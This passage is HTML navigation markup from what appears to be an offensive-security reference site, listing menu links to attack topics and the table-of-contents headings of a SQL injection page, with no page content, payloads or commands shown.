<label class="md-nav__link" for="__nav_24" id="__nav_24_label" tabindex="0">
<span class="md-ellipsis">
Hidden Parameters
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_24_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_24">
<span class="md-nav__icon md-icon"></span>
Hidden Parameters
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Hidden%20Parameters/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Hidden Parameters
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_25" >
<label class="md-nav__link" for="__nav_25" id="__nav_25_label" tabindex="0">
<span class="md-ellipsis">
Insecure Deserialization
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_25_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_25">
<span class="md-nav__icon md-icon"></span>
Insecure Deserialization
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/DotNET/" class="md-nav__link">
<span class="md-ellipsis">
.NET Serialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Java/" class="md-nav__link">
<span class="md-ellipsis">
Java Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Node/" class="md-nav__link">
<span class="md-ellipsis">
Node Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/PHP/" class="md-nav__link">
<span class="md-ellipsis">
PHP Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Python/" class="md-nav__link">
<span class="md-ellipsis">
Python Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Ruby/" class="md-nav__link">
<span class="md-ellipsis">
Ruby Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/YAML/" class="md-nav__link">
<span class="md-ellipsis">
YAML Deserialization
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_26" >
<label class="md-nav__link" for="__nav_26" id="__nav_26_label" tabindex="0">
<span class="md-ellipsis">
Insecure Direct Object References
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_26_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_26">
<span class="md-nav__icon md-icon"></span>
Insecure Direct Object References
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Direct%20Object%20References/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Direct Object References
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_27" >
<label class="md-nav__link" for="__nav_27" id="__nav_27_label" tabindex="0">
<span class="md-ellipsis">
Insecure Management Interface
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_27_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_27">
<span class="md-nav__icon md-icon"></span>
Insecure Management Interface
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Management%20Interface/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Management Interface
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_28" >
<label class="md-nav__link" for="__nav_28" id="__nav_28_label" tabindex="0">
<span class="md-ellipsis">
Insecure Randomness
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_28_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_28">
<span class="md-nav__icon md-icon"></span>
Insecure Randomness
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Randomness/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Randomness
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_29" >
<label class="md-nav__link" for="__nav_29" id="__nav_29_label" tabindex="0">
<span class="md-ellipsis">
Insecure Source Code Management
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_29_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_29">
<span class="md-nav__icon md-icon"></span>
Insecure Source Code Management
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Source%20Code%20Management/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Source Code Management
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_30" >
<label class="md-nav__link" for="__nav_30" id="__nav_30_label" tabindex="0">
<span class="md-ellipsis">
JSON Web Token
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_30_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_30">
<span class="md-nav__icon md-icon"></span>
JSON Web Token
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../JSON%20Web%20Token/" class="md-nav__link">
<span class="md-ellipsis">
JWT - JSON Web Token
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_31" >
<label class="md-nav__link" for="__nav_31" id="__nav_31_label" tabindex="0">
<span class="md-ellipsis">
Java RMI
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_31_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_31">
<span class="md-nav__icon md-icon"></span>
Java RMI
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Java%20RMI/" class="md-nav__link">
<span class="md-ellipsis">
Java RMI
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_32" >
<label class="md-nav__link" for="__nav_32" id="__nav_32_label" tabindex="0">
<span class="md-ellipsis">
Kubernetes
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_32_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_32">
<span class="md-nav__icon md-icon"></span>
Kubernetes
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Kubernetes/" class="md-nav__link">
<span class="md-ellipsis">
Kubernetes
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_33" >
<label class="md-nav__link" for="__nav_33" id="__nav_33_label" tabindex="0">
<span class="md-ellipsis">
LDAP Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_33_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_33">
<span class="md-nav__icon md-icon"></span>
LDAP Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../LDAP%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
LDAP Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_34" >
<label class="md-nav__link" for="__nav_34" id="__nav_34_label" tabindex="0">
<span class="md-ellipsis">
LaTeX Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_34_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_34">
<span class="md-nav__icon md-icon"></span>
LaTeX Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../LaTeX%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
LaTex Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_35" >
<label class="md-nav__link" for="__nav_35" id="__nav_35_label" tabindex="0">
<span class="md-ellipsis">
Mass Assignment
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_35_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_35">
<span class="md-nav__icon md-icon"></span>
Mass Assignment
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Mass%20Assignment/" class="md-nav__link">
<span class="md-ellipsis">
Mass Assignment
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_36" >
<label class="md-nav__link" for="__nav_36" id="__nav_36_label" tabindex="0">
<span class="md-ellipsis">
Methodology and Resources
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_36_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_36">
<span class="md-nav__icon md-icon"></span>
Methodology and Resources
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Active%20Directory%20Attack/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Bind%20Shell%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Bind Shell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Cloud - AWS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Cloud - Azure
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Container%20-%20Docker%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Container - Docker
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Container%20-%20Kubernetes%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Container - Kubernetes
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Escape%20Breakout/" class="md-nav__link">
<span class="md-ellipsis">
Application Escape and Breakout
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/HTML%20Smuggling/" class="md-nav__link">
<span class="md-ellipsis">
HTML Smuggling
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Hash%20Cracking/" class="md-nav__link">
<span class="md-ellipsis">
Hash Cracking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Initial%20Access/" class="md-nav__link">
<span class="md-ellipsis">
Initial Access
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Linux%20-%20Evasion/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Evasion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Linux%20-%20Persistence/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/MSSQL%20Server%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Server
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Metasploit
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Methodology%20and%20enumeration/" class="md-nav__link">
<span class="md-ellipsis">
Bug Hunting Methodology and Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Miscellaneous%20-%20Tricks/" class="md-nav__link">
<span class="md-ellipsis">
Miscellaneous & Tricks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Network%20Discovery/" class="md-nav__link">
<span class="md-ellipsis">
Network Discovery
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Network%20Pivoting%20Techniques/" class="md-nav__link">
<span class="md-ellipsis">
Network Pivoting Techniques
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Office%20-%20Attacks/" class="md-nav__link">
<span class="md-ellipsis">
Office - Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Powershell%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Powershell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Reverse Shell Cheat Sheet
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Source%20Code%20Management/" class="md-nav__link">
<span class="md-ellipsis">
Source Code Management & CI/CD Compromise
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Subdomains%20Enumeration/" class="md-nav__link">
<span class="md-ellipsis">
Subdomains Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Vulnerability%20Reports/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Reports
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
Windows - AMSI Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20DPAPI/" class="md-nav__link">
<span class="md-ellipsis">
Windows - DPAPI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Defenses/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Defenses
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Download and execute methods
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Mimikatz/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Mimikatz
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Persistence/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Using%20credentials/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Using credentials
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_37" >
<label class="md-nav__link" for="__nav_37" id="__nav_37_label" tabindex="0">
<span class="md-ellipsis">
NoSQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_37_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_37">
<span class="md-nav__icon md-icon"></span>
NoSQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../NoSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
NoSQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_38" >
<label class="md-nav__link" for="__nav_38" id="__nav_38_label" tabindex="0">
<span class="md-ellipsis">
OAuth Misconfiguration
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_38_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_38">
<span class="md-nav__icon md-icon"></span>
OAuth Misconfiguration
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../OAuth%20Misconfiguration/" class="md-nav__link">
<span class="md-ellipsis">
OAuth Misconfiguration
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_39" >
<label class="md-nav__link" for="__nav_39" id="__nav_39_label" tabindex="0">
<span class="md-ellipsis">
Open Redirect
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_39_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_39">
<span class="md-nav__icon md-icon"></span>
Open Redirect
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Open%20Redirect/" class="md-nav__link">
<span class="md-ellipsis">
Open URL Redirection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_40" >
<label class="md-nav__link" for="__nav_40" id="__nav_40_label" tabindex="0">
<span class="md-ellipsis">
Prompt Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_40_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_40">
<span class="md-nav__icon md-icon"></span>
Prompt Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Prompt%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Prompt Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_41" >
<label class="md-nav__link" for="__nav_41" id="__nav_41_label" tabindex="0">
<span class="md-ellipsis">
Prototype Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_41_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_41">
<span class="md-nav__icon md-icon"></span>
Prototype Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Prototype%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
Prototype Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_42" >
<label class="md-nav__link" for="__nav_42" id="__nav_42_label" tabindex="0">
<span class="md-ellipsis">
Race Condition
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_42_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_42">
<span class="md-nav__icon md-icon"></span>
Race Condition
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Race%20Condition/" class="md-nav__link">
<span class="md-ellipsis">
Race Condition
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_43" >
<label class="md-nav__link" for="__nav_43" id="__nav_43_label" tabindex="0">
<span class="md-ellipsis">
Request Smuggling
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_43_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_43">
<span class="md-nav__icon md-icon"></span>
Request Smuggling
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Request%20Smuggling/" class="md-nav__link">
<span class="md-ellipsis">
Request Smuggling
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_44" >
<label class="md-nav__link" for="__nav_44" id="__nav_44_label" tabindex="0">
<span class="md-ellipsis">
SAML Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_44_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_44">
<span class="md-nav__icon md-icon"></span>
SAML Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../SAML%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SAML Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--active md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_45" checked>
<label class="md-nav__link" for="__nav_45" id="__nav_45_label" tabindex="0">
<span class="md-ellipsis">
SQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_45_label" aria-expanded="true">
<label class="md-nav__title" for="__nav_45">
<span class="md-nav__icon md-icon"></span>
SQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item md-nav__item--active">
<input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
<label class="md-nav__link md-nav__link--active" for="__toc">
<span class="md-ellipsis">
SQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<a href="./" class="md-nav__link md-nav__link--active">
<span class="md-ellipsis">
SQL Injection
</span>
</a>
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tools" class="md-nav__link">
<span class="md-ellipsis">
Tools
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#entry-point-detection" class="md-nav__link">
<span class="md-ellipsis">
Entry point detection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#dbms-identification" class="md-nav__link">
<span class="md-ellipsis">
DBMS Identification
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#sql-injection-using-sqlmap" class="md-nav__link">
<span class="md-ellipsis">
SQL injection using SQLmap
</span>
</a>
<nav class="md-nav" aria-label="SQL injection using SQLmap">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#basic-arguments-for-sqlmap" class="md-nav__link">
<span class="md-ellipsis">
Basic arguments for SQLmap
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#load-a-request-file-and-use-mobile-user-agent" class="md-nav__link">
<span class="md-ellipsis">
Load a request file and use mobile user-agent
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#custom-injection-in-useragentheaderreferercookie" class="md-nav__link">
<span class="md-ellipsis">
Custom injection in UserAgent/Header/Referer/Cookie
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#second-order-injection" class="md-nav__link">
<span class="md-ellipsis">
Second order injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#shell" class="md-nav__link">
<span class="md-ellipsis">
Shell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#crawl-a-website-with-sqlmap-and-auto-exploit" class="md-nav__link">
<span class="md-ellipsis">
Crawl a website with SQLmap and auto-exploit
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#using-tor-with-sqlmap" class="md-nav__link">
<span class="md-ellipsis">
Using TOR with SQLmap
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#using-a-proxy-with-sqlmap" class="md-nav__link">
<span class="md-ellipsis">
Using a proxy with SQLmap
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#using-chrome-cookie-and-a-proxy" class="md-nav__link">
<span class="md-ellipsis">
Using Chrome cookie and a Proxy
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#using-suffix-to-tamper-the-injection" class="md-nav__link">
<span class="md-ellipsis">
Using suffix to tamper the injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#general-tamper-option-and-tampers-list" class="md-nav__link">
<span class="md-ellipsis">
General tamper option and tamper's list
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#sqlmap-without-sql-injection" class="md-nav__link">
<span class="md-ellipsis">
SQLmap without SQL injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#authentication-bypass" class="md-nav__link">
<span class="md-ellipsis">
Authentication bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#authentication-bypass-raw-md5-sha1" class="md-nav__link">
<span class="md-ellipsis">
Authentication Bypass (Raw MD5 SHA1)
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#polyglot-injection-multicontext" class="md-nav__link">
<span class="md-ellipsis">
Polyglot injection (multicontext)
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#routed-injection" class="md-nav__link">
<span class="md-ellipsis">
Routed injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#insert-statement-on-duplicate-key-update" class="md-nav__link">
<span class="md-ellipsis">
Insert Statement - ON DUPLICATE KEY UPDATE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#generic-waf-bypass" class="md-nav__link">
<span class="md-ellipsis">
Generic WAF Bypass
</span>
</a>
<nav class="md-nav" aria-label="Generic WAF Bypass">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#white-spaces-alternatives" class="md-nav__link">
<span class="md-ellipsis">
White spaces alternatives
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#no-comma-allowed" class="md-nav__link">
<span class="md-ellipsis">
No Comma Allowed
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#no-equal-allowed" class="md-nav__link">
<span class="md-ellipsis">
No Equal Allowed
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#case-modification" class="md-nav__link">
<span class="md-ellipsis">
Case modification
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#labs" class="md-nav__link">
<span class="md-ellipsis">
Labs
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="BigQuery%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Google BigQuery SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="Cassandra%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cassandra Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="DB2%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
DB2 Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="HQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Hibernate Query Language Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="MSSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="MySQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
MySQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="OracleSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Oracle SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="PostgreSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
PostgreSQL injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="SQLite%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SQLite Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_46" >
<label class="md-nav__link" for="__nav_46" id="__nav_46_label" tabindex="0">
<span class="md-ellipsis">
Server Side Include Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_46_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_46">
<span class="md-nav__icon md-icon"></span>
Server Side Include Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Server%20Side%20Include%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Include Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_47" >
<label class="md-nav__link" for="__nav_47" id="__nav_47_label" tabindex="0">
<span class="md-ellipsis">
Server Side Request Forgery
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_47_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_47">
<span class="md-nav__icon md-icon"></span>
Server Side Request Forgery
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
